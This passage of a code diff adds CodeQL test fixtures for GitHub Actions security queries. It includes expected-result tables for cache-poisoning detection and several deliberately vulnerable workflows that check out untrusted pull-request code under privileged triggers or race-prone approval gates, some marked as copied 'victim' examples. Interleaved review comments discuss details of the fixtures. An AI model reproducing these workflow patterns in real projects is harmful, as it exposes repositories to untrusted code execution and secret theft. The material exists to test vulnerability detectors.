+| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step |
+| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step |
+| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step |
+| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step |
+| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step |
+| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step |
+| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step |
+| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step |
+| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step |
+#select
+| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step |
.github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target |
+| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@).
| .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
new file mode 100644
index 000000000000..9d1910990fc0
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
@@ -0,0 +1,2 @@
+Security/CWE-349/CachePoisoningViaDirectCache.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
new file mode 100644
index 000000000000..6b1a3e873134
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
@@ -0,0 +1,53 @@
+edges
+| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step |
+| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step |
+| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step |
+| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step |
+| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step |
+| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step |
+| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step |
+| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step |
+| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step |
+| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step |
+| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step |
+| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step |
+| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step |
+| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step |
+| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip |
+| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step |
.github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step |
+| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step |
+| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step |
+| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step |
+| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step |
+| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip |
+| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step |
+| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step |
+| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step |
+| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step |
+| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step |
+| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step |
+| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step |
+| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step |
+| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step |
+|
.github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step |
+| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step |
+| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step |
+| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step |
+| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step |
+| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step |
+| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step |
+| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step |
+| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step |
+| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step |
+| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step |
+| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step |
+| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step |
+| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step |
+#select
+| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses
Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@).
| .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
new file mode 100644
index 000000000000..89db21d70f59
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
@@ -0,0 +1,2 @@
+Security/CWE-349/CachePoisoningViaPoisonableStep.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml
new file mode 100644
index 000000000000..0913ac8bbcfc
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml
@@ -0,0 +1,21 @@
+name: Actor
+
+on: pull_request
+
+permissions:
+ contents: write
+
+jobs:
+ template-oss:
+ name: test
+ if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: |
+ ./cmd
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
new file mode 100644
index 000000000000..a4acd7387660
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
@@ -0,0 +1,68 @@
+# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+permissions: 'write-all'
+jobs:
+ test1:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+
+ - uses: actions/github-script@v6
+ name: Get PR branch
+ id: issue
+ with:
+ script: |
+ const pr = context.payload.issue.number
+ const data = await github.rest.pulls.get({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: pr
+ })
+ return {
+ ref: data.data.head.ref,
+ sha: data.data.head.sha,
+ }
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: ${{ fromJson(steps.issue.outputs.result).sha }}
+ - run: bash comment_example/tests.sh
+
+ test2:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+
+ - uses: actions/github-script@v6
+ name: Get PR branch
+ id: issue
+ with:
+ script: |
+ const pr = context.payload.issue.number
+ const data = await github.rest.pulls.get({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: pr
+ })
+ return {
+ ref: data.data.head.ref,
+ sha: data.data.head.sha,
+ }
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: ${{ fromJson(steps.issue.outputs.result).ref }}
+ - run: bash comment_example/tests.sh
+
+ test3:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: "refs/pull/${{ github.event.number }}/merge"
+ - run:
bash comment_example/tests.sh
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml
new file mode 100644
index 000000000000..f0a3035777c5
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml
@@ -0,0 +1,31 @@
+# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml
+name: Environment PR Check
+
+on:
+ pull_request_target:
+ branches:
+ - main
+ paths:
+ - 'README.md'
+ workflow_dispatch:
+jobs:
+ test:
+ environment: Public CI
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.ref }}
+
+ - name: Set Node.js 20.x for GitHub Action
+ uses: actions/setup-node@v4
+ with:
+ node-version: 20.x
+
+ - name: installing node_modules
+ run: cd deployment_example && npm install
+
+ - name: Build GitHub Action
+ run: cd deployment_example && npm run build
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml
new file mode 100644
index 000000000000..5c6e28eafc8d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml
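Review bot: In job test3 of comment.yml the checkout ref `"refs/pull/${{ github.event.number }}/merge"` reads `github.event.number`, which is not a field of the `issue_comment` payload this workflow is triggered on (the PR number there is `github.event.issue.number`), so as written the expression expands to an empty string. If the job is meant to model the safe merge-ref pattern, `ref: "refs/pull/${{ github.event.issue.number }}/merge"` is the realistic form; this presumably does not change what the query matches, but the fixture is copied from an external repository and will be read as a reference pattern. The same line appears in the identical test3 job of test0.yml later in this commit.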
@@ -0,0 +1,31 @@
+# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml
+name: Environment PR Check
+
+on:
+ pull_request_target:
+ branches:
+ - main
+ paths:
+ - 'README.md'
+ workflow_dispatch:
+jobs:
+ test:
+ environment: Public CI
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - name: Set Node.js 20.x for GitHub Action
+ uses: actions/setup-node@v4
+ with:
+ node-version: 20.x
+
+ - name: installing node_modules
+ run: cd deployment_example && npm install
+
+ - name: Build GitHub Action
+ run: cd deployment_example && npm run build
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml
new file mode 100644
index 000000000000..1f04440d28bb
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml
@@ -0,0 +1,17 @@
+# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/label_victim.yml
+name: Label Trigger Test
+on:
+ pull_request_target:
+ types: [labeled]
+ branches: [main]
+
+jobs:
+ integration-tests:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: bash label_example/tests.sh
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml
new file mode 100644
index 000000000000..1debaecf97d3
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml
@@ -0,0 +1,17 @@
+# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable
+name: Label Trigger Test
+on:
+ pull_request_target:
+ types: [labeled]
+ branches: [main]
+
+jobs:
+ integration-tests:
+ runs-on: ubuntu-latest
+ if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]'
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: bash label_example/tests.sh
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml
new file mode 100644
index 000000000000..a4acd7387660
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml
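Review bot: The leading comment of label_actor.yml, `# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable`, reads as a note-to-self rather than a description of the fixture, and a reader has to infer from it that no alert is expected here. Since the only difference from label.yml is the `if:` gate (actor and repository owner instead of a `safe-to-test` label), a comment stating that directly would make the expected outcome explicit, e.g. `# Negative case: the gate checks actor/repository owner rather than a label, so (unlike label.yml) it is presumably not treated as bypassable by a TOCTOU race on the PR head`.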
@@ -0,0 +1,68 @@
+# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+permissions: 'write-all'
+jobs:
+ test1:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+
+ - uses: actions/github-script@v6
+ name: Get PR branch
+ id: issue
+ with:
+ script: |
+ const pr = context.payload.issue.number
+ const data = await github.rest.pulls.get({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: pr
+ })
+ return {
+ ref: data.data.head.ref,
+ sha: data.data.head.sha,
+ }
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: ${{ fromJson(steps.issue.outputs.result).sha }}
+ - run: bash comment_example/tests.sh
+
+ test2:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+
+ - uses: actions/github-script@v6
+ name: Get PR branch
+ id: issue
+ with:
+ script: |
+ const pr = context.payload.issue.number
+ const data = await github.rest.pulls.get({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: pr
+ })
+ return {
+ ref: data.data.head.ref,
+ sha: data.data.head.sha,
+ }
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: ${{ fromJson(steps.issue.outputs.result).ref }}
+ - run: bash comment_example/tests.sh
+
+ test3:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: "refs/pull/${{ github.event.number }}/merge"
+ - run: bash comment_example/tests.sh
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml
new file mode 100644
index 000000000000..878b83779613
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml
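Review bot: In the `test3` job, `ref: "refs/pull/${{ github.event.number }}/merge"` reads a field that, as far as I know, the `issue_comment` payload does not carry (the PR number there is `github.event.issue.number`), so the expression would expand to `refs/pull//merge` rather than the merge ref. If the job is meant to model the merge-ref variant, `ref: "refs/pull/${{ github.event.issue.number }}/merge"` is the form that resolves; if it is kept verbatim from the upstream fixture, a comment saying so would stop readers from copying it as a working pattern. The three jobs differ only in the ref they check out (`.sha`, `.ref`, merge ref), so a one-line comment per job naming which of them the query should flag would make the expected output self-explanatory.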
@@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml new file mode 100644 index 000000000000..6f03a0e966a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml 
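Review bot: In the `Get environment from comment` step, the time-of-push guard does `jq -r .pushed_at` on the `gh api /repos/${GH_REPO}/pulls/${PR_NUMBER}` response, but as far as I know the pull-request object has no top-level `pushed_at` (only the repository objects under `head.repo` and `base.repo` do), so the value is `null`, `date -d null` fails and the `-gt` comparison ends up between empty operands, never rejecting anything. Since this step is what distinguishes test1.yml from test4.yml, it is worth confirming which field the query is expected to recognise as the guard and pointing the fixture at it, e.g. `pushed_at="$(echo "$pr" | jq -r .head.repo.pushed_at)"`, or stating in a comment that the fixture deliberately models a guard that does not work. The same `jq -r .pushed_at` appears in the `Check for conflicting pushes` step of test2.yml and test3.yml.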
@@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
